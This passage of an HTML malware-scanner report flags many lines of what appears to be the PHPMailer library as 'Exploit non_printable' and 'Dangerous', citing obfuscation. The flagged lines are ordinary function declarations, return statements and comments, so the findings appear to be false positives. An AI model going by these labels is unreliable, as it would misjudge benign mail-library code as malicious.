<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1425</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) >= </span><span style="color: #0000BB">3</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1430</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">filter_var</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">FILTER_VALIDATE_EMAIL</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1437</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool </span><span style="color: #DD0000">"true" </span><span style="color: #007700">if </span><span style="color: #0000BB">required functions </span><span style="color: #007700">for </span><span style="color: #0000BB">IDN support are present</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1439</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">idnSupported</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">PHP </span><span style="color: #007700"><= </span><span style="color: #0000BB">5.2</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1442</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'idn_to_ascii'</span><span style="color: #007700">) and </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_convert_encoding'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1448</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">silently returns unmodified address </span><span style="color: #007700">if:</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1450</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions are not available</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1454</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The encoded address in ASCII form</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">punyencodeAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1458</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">, </span><span style="color: #0000BB">CharSet</span><span style="color: #007700">, and </span><span style="color: #0000BB">at</span><span style="color: #007700">-</span><span style="color: #0000BB">sign</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">) . </span><span style="color: #0000BB">$punycode</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1473</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$address</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1480</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean false on error </span><span style="color: #007700">- </span><span style="color: #0000BB">See the ErrorInfo property </span><span style="color: #007700">for </span><span style="color: #0000BB">details of the error</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1482</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">send</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1488</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">postSend</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1504</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">preSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1604</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">postSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1611</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1613</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1615</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1619</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">$sendMethod</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1643</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1717</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isShellSafe</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1744</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions that access local file paths</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1749</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isPermittedPath</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1751</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'#^[a-z]+://#i'</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1763</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header by the receiver</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1804</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to load your own SMTP implementation</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1805</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">SMTP</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1807</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSMTPInstance</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1812</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1817</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">there is a bad MAIL FROM</span><span style="color: #007700">, </span><span style="color: #0000BB">RCPT</span><span style="color: #007700">, or </span><span style="color: #0000BB">DATA input</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1827</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1883</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the operation failed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1890</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpConnect</span><span style="color: #007700">(</span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpClose</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2024</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">it cannot load the language file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2031</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setLanguage</span><span style="color: #007700">(</span><span style="color: #0000BB">$langcode </span><span style="color: #007700">= </span><span style="color: #DD0000">'en'</span><span style="color: #007700">, </span><span style="color: #0000BB">$lang_path </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2058</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #DD0000">',</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2091</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">$foundlang</span><span style="color: #007700">; </span><span style="color: #FF8000">// Returns false if language not found</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getTranslations</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2100</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2113</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrAppend</span><span style="color: #007700">(</span><span style="color: #0000BB">$type</span><span style="color: #007700">, </span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$type </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">', '</span><span style="color: #007700">, </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">) . </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrFormat</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2132</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2134</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]), </span><span style="color: #DD0000">'phrase'</span><span style="color: #007700">) . </span><span style="color: #DD0000">' <' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wrapText</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$length</span><span style="color: #007700">, </span><span style="color: #0000BB">$qp_mode </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2238</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$message</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2248</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">integer</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2250</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">utf8CharBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$encodedText</span><span style="color: #007700">, </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2284</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
